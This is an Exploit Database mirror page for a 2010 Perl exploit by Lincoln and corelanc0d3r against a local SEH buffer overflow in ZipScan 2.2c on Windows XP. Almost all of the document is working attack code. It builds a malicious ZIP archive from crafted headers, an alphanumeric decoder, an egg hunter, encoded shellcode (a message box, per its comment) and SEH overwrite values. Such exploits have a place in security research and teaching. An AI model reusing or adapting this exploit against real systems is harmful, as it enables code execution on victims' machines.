ZipScan 2.2c – Local Overflow (SEH)

• Exploit Database
• 12 阅读

• 作者： Lincoln & corelanc0d3r
  日期： 2010-04-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12035/

• #!/usr/bin/perl
  # Software: ZipScan 2.2c (.zip)
  # Bug found by: Lincoln
  # Author: Lincoln & corelanc0d3r
  # OS: Windows
  # Tested on : XP SP3 En (VirtualBox)
  # Type of vuln: SEH
  # Greetz to : Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  #
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  #
  #
  # Code :
  print "|------------------------------------------------------------------|\n";
  print "| __ __|\n";
  print "| _________________/ /___ _____ / /________ _____ ___|\n";
  print "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";
  print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";
  print "||\n";
  print "| http://www.corelan.be:8800 |\n";
  print "||\n";
  print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
  print "[+] Exploit for ZipScan 2.2c \n";
  
  
  
  my $filename="zipscan.zip";
  my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
  "\x00\x00\x00\x00\x00\x00\x00\x00" .
  "\x88\x13" .# file size: 5k
  "\x00\x00\x00";
  
  my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  "\x88\x13". # file size: 5k
  "\x00\x00\x00\x00\x00\x00\x01\x00".
  "\x24\x00\x00\x00\x00\x00\x00\x00";
  
  my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
  "\xb6\x13\x00\x00". # +46
  "\xa6\x13\x00\x00". # +30
  "\x00\x00";
  
  my $decoder =
  #pop edx pop esp
  "\x5b\x5b\x5b\x5b\x5c".
  
  #jmp ebp
  "\x25\x4A\x4D\x4E\x55".
  "\x25\x35\x32\x31\x2A".
  "\x2d\x55\x55\x55\x64".
  "\x2d\x55\x55\x55\x64".
  "\x2d\x56\x55\x56\x51".
  "\x50".
  
  #add ebp, 526h
  "\x25\x4A\x4D\x4E\x55".
  "\x25\x35\x32\x31\x2A".
  "\x2d\x35\x69\x48\x54".
  "\x2d\x25\x69\x48\x54".
  "\x2d\x25\x68\x48\x52".
  "\x50".
  
  #jmp back to decoded op code
  "\x7a\xb5";
  
  #basereg ebp, modified egg hunter mov edx,ebp
  #points egg hunter to unmodified shellcode
  my $egg =
  "UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
  "BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
  "nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";
  
  #msg box "Exploited by Corelan Security Team"
  #encoded with Alpha2 base reg edi
  my $shellcode =
  "w00tw00t".
  "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
  "BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
  "9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
  "KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
  "JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
  "rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
  "NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
  "vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
  "QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
  "uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
  "jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
  "orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
  "T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
  "D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
  "vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
  "1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
  "8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
  "rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
  "yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
  "OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
  "Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
  "LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
  "PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
  "hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
  "T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
  "9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
  "QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
  "cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
  "UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
  "XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
  "MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
  "qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";
  
  #Filler
  my $mjunk = "A" x 30;
  
  # --- payload --- 5k total
  my $junk = "A" x 22 . $egg . "A" x 3427;
  my $nseh="\x7a\x06\x41\x41";
  my $seh="\x16\x09\x01\x10"; #universal
  my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
  $payload = $payload . ".txt";
  
  print "[+] Size : " . length($payload)."\n";
  system("del $filename");
  print "[+] Creating new vulnerable file: $filename\n\n";
  open(FILE, ">$filename");
  print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
  close(FILE);